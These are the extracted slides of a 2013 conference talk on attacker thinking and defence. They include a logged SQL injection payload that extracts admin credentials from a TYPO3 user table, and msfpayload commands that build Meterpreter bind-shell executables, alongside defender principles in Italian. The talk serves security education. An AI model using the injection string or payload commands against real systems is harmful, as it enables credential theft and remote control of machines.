  • 28. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com 89.253.105.39 - - [15/Nov/2012:12:32:14 +0100] "GET /some_path/some_file.html?tx_wfqbe_pi1[uid]= 11502+and(select+1+from(select+count(*),concat_ws(0x3a, substring((SELECT+binary(concat(concat_ws(0x3a,username,password,admin), repeat(0x00,100)))+FROM+be_users+WHERE+admin=1+LIMIT+1,1),1,64),floor( rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.10" Web Shell Extension
  • 29. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com http://evader.stonesoft.com/ http://insecure.org/stf/secnet_ids/secnet_ids.html
  • 30. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 31. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com msfpayload windows/meterpreter/bind_tcp X > moca_x86_tcp_4444.exe
  • 32. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com msfpayload windows/x64/meterpreter/bind_tcp X > moca_x64_tcp_4444.exe
  • 33. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com “The truth is, consumer-grade antivirus products can’t protect against targeted malware created by well- resourced nation-states with bulging budgets. They can protect you against run-of-the-mill malware: banking trojans, keystroke loggers and e-mail worms. But targeted attacks like these go to great lengths to avoid antivirus products on purpose”
  • 34. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com <#1> Ragiona come un Attaccante in modo da comprendere cosa faranno e come ti attaccheranno <#2> Cerca di capire i loro obiettivi, la capacità che hanno, ma soprattutto i vincoli operativi che hanno <#3> Identifica il valore «percepito» di ciò che vuoi difendere, ma soprattutto cosa vuoi difendere <#4> Lavora su tutto il perimetro di difesa, senza atti di fede <#5> Se la tua difesa è più economica dell’attacco, tu sarai sempre in vantaggio
  • 35. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 36. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Domande? Italian ‫ة‬َّ‫ي‬َ‫أ‬ ‫ِب‬‫ل‬‫ا‬َ‫ط‬َ‫م‬ Arabic ¿Preguntas? Spanish Questions? English tupoQghachmey Klingon Sindarin Japanese Ερωτήσεις? Greek вопросы? Russian